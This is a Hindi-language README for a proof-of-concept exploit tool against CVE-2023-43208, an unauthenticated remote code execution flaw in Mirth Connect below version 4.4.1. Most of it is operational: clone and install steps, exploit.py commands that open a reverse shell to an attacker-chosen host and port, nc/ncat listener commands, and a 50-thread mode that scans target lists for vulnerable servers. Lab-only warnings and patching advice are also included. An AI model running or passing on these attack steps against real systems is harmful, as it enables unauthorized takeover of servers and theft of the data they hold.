
CVE-2023-43208 के लिए एक proof-of-concept एक्सप्लॉइट, जो Mirth Connect के संस्करण 4.4.1 से पहले के संस्करणों में एक रिमोट कोड निष्पादन (remote code execution) भेद्यता है।
⚠️ केवल शैक्षिक और प्रयोगशाला उपयोग के लिए ⚠️
CVE-2023-43208 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Mirth Connect के संस्करण 4.4.1 से पहले के संस्करणों में एक रिमोट कोड एक्सिक्यूशन भेद्यता है।
यह टूल केवल निम्नलिखित के लिए है:
इसका उपयोग न करें:
सभी लागू कानूनों और विनियमों का पालन करने की जिम्मेदारी आपकी है। इस टूल के दुरुपयोग के परिणामस्वरूप आपराधिक आरोप लग सकते हैं।
यह एक्सप्लॉइट Mirth Connect के /api/users एंडपॉइंट में XML डिसीरियलाइज़ेशन भेद्यता को लक्षित करता है, जो प्रभावित संस्करणों (< 4.4.1) पर बिना प्रमाणीकरण के रिमोट कोड एक्सिक्यूशन की अनुमति देता है।
यह एक CRITICAL भेद्यता है और इसे केवल पृथक प्रयोगशाला वातावरण में आपके अपने सिस्टम के साथ ही परीक्षण किया जाना चाहिए।
requirements.txt में सूचीबद्ध आवश्यक पैकेजgit clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git cd CVE-2023-43208-EXPLOIT
pip install -r requirements.txt 💻 उपयोग (केवल प्रयोगशाला उपयोग के लिए) इंटरैक्टिव मोड (प्रयोगशाला के लिए अनुशंसित) bash python exploit.py कमांड लाइन मोड bash
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444
python exploit.py -f targets.txt -t 50 -o vulnerable.txt
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive विकल्प text -u, --url Target URL to exploit (LAB USE ONLY) -lh, --lhost Listening host (your IP) -lp, --lport Listening port -f, --file File containing target URLs to scan -o, --output Output file for saving scan results -t, --threads Number of threads for scanning (default: 50) --no-interactive Run in non-interactive mode 🎯 प्रयोगशाला वातावरण उदाहरण अपनी प्रयोगशाला सेट करें:
पृथक VM में भेद्य Mirth Connect संस्करण (< 4.4.1) स्थापित करें
नियंत्रित नेटवर्क का उपयोग करें (जैसे, VirtualBox/VMware में NAT/Host-only)
इसे इंटरनेट पर कभी एक्सपोज़ न करें
अपना लिसनर शुरू करें:
ncat -lnvp 4444
nc -lnvp 4444 अपनी प्रयोगशाला में एक्सप्लॉइट चलाएँ:
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444 🧪 परीक्षण वातावरण आवश्यकताएँ पृथक नेटवर्क/VLAN
केवल वर्चुअल मशीनें
कोई प्रोडक्शन डेटा नहीं
बाहरी पहुँच को अवरुद्ध करने वाले फ़ायरवॉल नियम
उचित प्राधिकरण प्रलेखित
📝 तकनीकी विवरण भेद्यता प्रकार: XML डिसीरियलाइज़ेशन RCE
प्रभावित संस्करण: Mirth Connect < 4.4.1
पैच किया गया संस्करण: 4.4.1 और उससे ऊपर
CVSS स्कोर: 9.8 (Critical)
हमला वेक्टर: नेटवर्क
प्रमाणीकरण: आवश्यक नहीं
एक्सप्लॉइट, /api/users एंडपॉइंट के माध्यम से RCE प्राप्त करने के लिए Commons Collections गैजेट्स का उपयोग करता है।
🛡️ सुरक्षा उपाय यदि आप Mirth Connect चला रहे हैं:
✅ संस्करण 4.4.1 या उससे बाद में अपडेट करें
✅ एडमिन इंटरफ़ेस तक नेटवर्क पहुँच प्रतिबंधित करें
✅ उचित प्रमाणीकरण लागू करें
✅ संदिग्ध XML पेलोड की निगरानी करें
👥 श्रेय मूल लेखक: K3ysTr0K3R & Chocapikk
संशोधक: M0h4
CVE: CVE-2023-43208
⚠️ अंतिम चेतावनी
╔══════════════════════════════════════════════════════════════╗ ║ THIS TOOL IS FOR LAB USE ONLY ║ ║ Unauthorized use is ILLEGAL and UNETHICAL ║ ║ You assume ALL risk and liability ║ ║ The author accepts NO responsibility for misuse ║ ╚══════════════════════════════════════════════════════════════╝